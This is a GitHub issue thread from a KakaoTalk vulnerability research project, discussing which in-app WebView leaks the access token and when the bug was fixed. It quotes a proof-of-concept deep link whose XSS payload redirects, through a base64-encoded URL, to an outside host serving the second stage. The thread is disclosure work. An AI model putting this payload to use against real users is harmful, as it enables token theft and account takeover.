### ISSUE TITLE
Ask question

### ISSUE THREAD

**Issue by firmianay** [stulle123/kakaotalk_analysis#1]
Great job!
I have a question. In the malicious URL, it seems that the token has been stolen without jumping to MyProfileSettingsActivity? I understand that the following is the first stage of the POC, the purpose is to allow CommerceBuyActivity webview to access the second URL and execute the second stage of the POC in MyProfileSettingsActivity webview?

```html
<script>
location.href = decodeURIComponent("kakaotalk%3A%2F%2Fbuy%2Fauth%2F0%2FcleanFrontRedirect%3FreturnUrl%3Dhttps%3A%2F%2Fm.shoppinghow.kakao.com%2Fm%2Fproduct%2FQ24620753380%2Fq%3A%22%3E%3Cimg%20src%3Dx%20onerror%3D%22document.location%3Datob%28%27aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUvZm9vLmh0bWw%3D%27%29%3B%22%3E");
</script>
```

**Comment by firmianay** [comment]
Btw, in which version was this vulnerability fixed?

**Comment by stulle123** [comment]
Great catch! You're right! Actually, `CommerceBuyActivity` is leaking the access token, not `MyProfileSettingsActivity` :-D

As an immediate fix, they took down `https://buy.kakao.com` and removed the `/auth/0/cleanFrontRedirect?returnUrl=` redirect. So that you can't load arbitrary JS in the `CommerceBuyActivity` WebView.

In version `10.4.5`, `CommerceBuyActivity` was still there and leaked the access token. Don't know in which version they've removed it, must be sometime around March 2024 (see [correspondence](https://github.com/stulle123/kakaotalk_analysis/blob/main/report/bug_bounty_correspondence.pdf)).

Just checked for the latest version `10.8.2` and here `CommerceBuyActivity` is definitely not present.

Will update the blog post accordingly!

Thanks!
